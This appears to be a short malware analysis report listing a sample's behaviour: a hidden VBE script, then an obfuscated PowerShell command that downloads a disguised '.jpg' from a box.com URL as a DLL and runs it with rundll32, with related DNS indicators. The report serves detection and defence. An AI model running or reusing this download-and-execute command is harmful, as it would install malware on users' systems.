Technical Information
- https://irons.box.com/shared/static/7bvm7l9xc8y46navlfp1exk6gh8l2ozq.jpg as %temp%\ghfauclmz_user_mrfri.dll
- %TEMP%\ixp000.tmp\h.vbe
- %TEMP%\ixp000.tmp\h.vbe
- 'ir###.box.com':443
- DNS ASK ir###.box.com
- '%WINDIR%\syswow64\wscript.exe' H.vbe' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' (New-Object sYstem.Net.webclieNt).dOwNlOadfile('""https://irons.box.com/shared/static/7bvm7l9xc8y46navlfp1exk6gh8l2ozq.jpg','%TEMP%\ghfauclmz_user_mrfri.dll');start-PrOcess ruNdll32.exe %TEMP%\...' (with hidden window)
- '%WINDIR%\syswow64\wscript.exe' H.vbe
- '%WINDIR%\syswow64\rundll32.exe' %TEMP%\ghfauclmz_user_mrfri.dll starter